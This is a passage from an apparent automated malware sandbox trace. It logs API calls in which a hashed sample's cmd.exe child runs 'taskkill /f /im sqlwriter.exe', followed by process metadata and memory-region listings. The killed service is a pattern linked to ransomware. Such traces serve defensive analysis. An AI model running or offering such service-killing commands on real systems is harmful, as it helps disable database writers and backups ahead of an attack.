returned -2 [0151.907] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0151.907] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0151.907] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0151.907] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0151.907] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0151.907] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0151.907] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0151.907] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0151.907] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0151.907] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0151.907] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0151.907] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0151.907] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0151.907] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0151.907] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0151.907] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0151.907] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0151.907] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0151.908] GetProcessHeap () returned 0x690000 [0151.908] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x210) returned 0x69ad10 [0151.908] GetProcessHeap () returned 0x690000 [0151.908] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x48) returned 0x69af28 [0151.908] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0151.908] GetProcessHeap () returned 0x690000 [0151.908] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x418) returned 0x6905c8 [0151.909] SetErrorMode (uMode=0x0) returned 0x8003 [0151.909] SetErrorMode (uMode=0x1) returned 0x0 [0151.909] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6905d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0151.909] SetErrorMode (uMode=0x8003) returned 0x1 [0151.909] GetProcessHeap () returned 0x690000 [0151.909] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x6905c8, Size=0x56) returned 0x6905c8 [0151.909] GetProcessHeap () returned 0x690000 [0151.909] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x6905c8) returned 0x56 [0151.909] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0151.909] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0151.909] GetProcessHeap () returned 0x690000 [0151.909] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x110) returned 0x69af78 [0151.909] GetProcessHeap () returned 0x690000 [0151.909] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x218) returned 0x690628 [0151.916] GetProcessHeap () returned 0x690000 [0151.916] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x690628, Size=0x112) returned 0x690628 [0151.916] GetProcessHeap () returned 0x690000 [0151.916] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x690628) returned 0x112 [0151.916] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0151.916] GetProcessHeap () returned 0x690000 [0151.916] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xe0) returned 0x69b090 [0151.918] GetProcessHeap () returned 0x690000 [0151.919] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x69b090, Size=0x76) returned 0x69b090 [0151.919] GetProcessHeap () returned 0x690000 [0151.919] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x69b090) returned 0x76 [0151.919] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0151.919] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0151.919] GetLastError () returned 0x2 [0151.919] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0151.919] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x69b110 [0151.920] GetProcessHeap () returned 0x690000 [0151.920] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x14) returned 0x6976e8 [0151.920] FindClose (in: hFindFile=0x69b110 | out: hFindFile=0x69b110) returned 1 [0151.920] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0151.920] GetLastError () returned 0x2 [0151.920] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x69b110 [0151.920] GetProcessHeap () returned 0x690000 [0151.920] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x6976e8, Size=0x4) returned 0x69b150 [0151.920] FindClose (in: hFindFile=0x69b110 | out: hFindFile=0x69b110) returned 1 [0151.921] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0151.921] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0151.921] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0151.925] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0151.925] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0151.925] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x130, hStdOutput=0x13c, hStdError=0x140)) [0151.925] GetProcessHeap () returned 0x690000 [0151.926] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x18) returned 0x697488 [0151.926] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0151.926] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0151.926] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0151.926] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0151.926] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0151.926] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0151.926] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0151.926] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0151.926] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0151.926] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0151.926] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0151.926] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0151.926] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0151.926] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0151.926] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0151.926] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0151.926] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0151.926] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0151.926] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0151.927] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0151.927] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0151.927] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0151.927] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0151.927] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0151.927] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0151.927] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0151.927] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0151.927] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0151.927] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0151.927] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0151.927] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0151.927] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0151.927] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0151.927] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0151.927] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0151.927] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0151.927] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0151.927] GetProcessHeap () returned 0x690000 [0151.927] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x697488) returned 1 [0151.927] GetProcessHeap () returned 0x690000 [0151.927] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa) returned 0x69b110 [0151.928] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0151.935] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im sqlwriter.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im sqlwriter.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im sqlwriter.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0xb88, dwThreadId=0xb44)) returned 1 [0151.955] CloseHandle (hObject=0x98) returned 1 [0151.955] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0151.955] GetProcessHeap () returned 0x690000 [0151.956] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x699d50) returned 1 [0151.956] GetEnvironmentStringsW () returned 0x699d50* [0151.956] GetProcessHeap () returned 0x690000 [0151.956] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa76) returned 0x697cc0 [0151.956] FreeEnvironmentStringsA (penv="=") returned 1 [0151.956] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0153.158] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0153.159] CloseHandle (hObject=0x9c) returned 1 [0153.159] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0153.159] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0153.160] GetProcessHeap () returned 0x690000 [0153.160] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x697cc0) returned 1 [0153.160] GetEnvironmentStringsW () returned 0x69b160* [0153.160] GetProcessHeap () returned 0x690000 [0153.160] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa9c) returned 0x697cc0 [0153.160] FreeEnvironmentStringsA (penv="=") returned 1 [0153.161] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0153.161] GetProcessHeap () returned 0x690000 [0153.161] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x697cc0) returned 1 [0153.161] GetEnvironmentStringsW () returned 0x69b160* [0153.161] GetProcessHeap () returned 0x690000 [0153.161] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa9c) returned 0x697cc0 [0153.161] FreeEnvironmentStringsA (penv="=") returned 1 [0153.161] GetProcessHeap () returned 0x690000 [0153.161] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x69b110) returned 1 [0153.161] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0153.161] _get_osfhandle (_FileHandle=1) returned 0x13c [0153.161] SetConsoleMode (hConsoleHandle=0x13c, dwMode=0x0) returned 0 [0153.161] _get_osfhandle (_FileHandle=1) returned 0x13c [0153.161] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0153.161] _get_osfhandle (_FileHandle=0) returned 0x130 [0153.161] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0153.161] GetConsoleOutputCP () returned 0x1b5 [0153.163] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0153.163] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.165] exit (_Code=128) Thread: id = 147 os_tid = 0x2f0 Process: id = "17" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x337af000" os_pid = "0xb88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0x12bc" cmd_line = "taskkill /f /im sqlwriter.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1671 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1672 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1673 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1674 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 1675 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1676 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 1677 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 1678 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 1679 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 1680 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 1681 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 1682 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1683 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1684 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1685 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1686 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 1687 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1688 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 1689 start_va = 0x45b0000 end_va = 0x45bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045b0000" filename = "" Region: id = 1690 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1691 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1692 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1693 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1694 start_va = 0x4400000 end_va = 0x451ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 1695 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1696 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1697 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1698 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1699 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1700 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1701 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1702 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1703 start_va = 0x4520000 end_va = 0x455ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 1704 start_va = 0x4560000 end_va = 0x459ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 1705 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1706 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1707 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1708 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1709 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1710 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1711 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1712 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1713 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1714 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1715 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1716 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1717 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 1718 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 1719 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 1720 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 1721 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 1722 start_va = 0x45c0000 end_va = 0x475ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045c0000" filename = "" Region: id = 1723 start_va = 0x45c0000 end_va = 0x4747fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045c0000" filename = "" Region: id = 1724 start_va = 0x4750000 end_va = 0x475ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004750000" filename = "" Region: id = 1725 start_va = 0x4760000 end_va = 0x4789fff monitored = 0 entry_point = 0x4765680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1726 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1727 start_va = 0x4760000 end_va = 0x48e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004760000" filename = "" Region: id = 1728 start_va = 0x48f0000 end_va = 0x5ceffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048f0000" filename = "" Region: id = 1729 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1730 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 1731 start_va = 0x4400000 end_va = 0x4404fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 1732 start_va = 0x4420000 end_va = 0x451ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004420000" filename = "" Region: id = 1733 start_va = 0x4410000 end_va = 0x4410fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 1734 